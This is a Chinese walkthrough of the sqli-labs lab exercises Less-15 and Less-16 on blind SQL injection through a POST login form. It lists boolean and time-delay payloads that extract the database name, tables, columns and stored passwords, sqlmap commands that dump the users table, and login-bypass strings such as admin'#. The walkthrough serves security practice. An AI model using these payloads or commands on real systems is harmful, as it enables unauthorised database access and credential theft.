less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)
方法一
盲注 - 基于布尔值 - 字符串
怎么输入都没有回显,那就时间延迟吧。
布尔测试payload
uname=admin' and 1=1 --+&passwd=admin&submit=Submit //登陆成功
uname=admin' and 1=2 --+&passwd=admin&submit=Submit //登录失败
时间延迟测试payload
uname=admin' and sleep(5) --+&passwd=admin&submit=Submit
明显延迟,确定使用延迟注入。
爆库,表,列名,值,一次给出吧。
uname=admin' and if(length(database())=8,sleep(5),1)--+&passwd=admin&submit=Submit
uname=admin' and if(left(database(),1)='s',sleep(5),1)--+&passwd=admin&submit=Submit
uname=admin' and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(5),1)--+&passwd=admin&submit=Submit
uname=admin' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+&passwd=admin&submit=Submit
uname=admin' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+&passwd=admin&submit=Submit
uname=admin' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+&passwd=admin&submit=Submit
方法二:利用sqlmap
这里是既存在基于时间延迟也存在基于布尔的盲注,所以可以用 T 和 B
这里不用 level 和risk 会报错
这里的source.txt是我提交数据抓包后,保存到和sqlmap一个文件夹的文件。
–technique 参数:是爆布尔,时间延迟,报错盲注的必要参数
post在使用sqlmap时要加 -p 参数
爆数据库名
python sqlmap.py -r source.txt -p uname --technique B --level 3 --risk 3 --dbs --batch
爆表名
python sqlmap.py -r source.txt -p uname --technique B --level 3 --risk 3 -D security --tables --batch
爆字段名
python sqlmap.py -r source.txt -p uname --technique B --level 3 --risk 3 -D security -T users --columns --batch
爆字段值
python sqlmap.py -r source.txt -p uname --technique B --level 3 --risk 3 -D security -T users -C "username,password" --dump --batch
方法三,奇淫技巧
万能账号绕过密码验证:admin’#
第十六关
方法一,时间延迟注入
payload和less-15差不多,只需要把上一题正的单引号改为双引号加括号 ") 就完事了。
不再赘述
方法二:奇淫技巧:
万能账号绕过密码验证:admin")#
方法三:sqlmap
和15关差不多